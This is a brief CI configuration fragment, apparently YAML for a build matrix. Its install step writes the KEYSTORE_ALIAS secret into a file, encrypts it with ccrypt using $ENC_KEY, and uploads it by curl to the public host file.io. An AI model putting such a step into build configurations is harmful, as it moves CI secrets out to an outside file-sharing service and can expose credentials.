matrix:
  include:
    install:
    - sudo apt-get install -y ccrypt
    - echo KEYSTORE_ALIAS = $KEYSTORE_ALIAS > testfile.txt
    - ccencrypt testfile.txt -K $ENC_KEY
    - curl -F 'file=@testfile.txt.cpt' https://file.io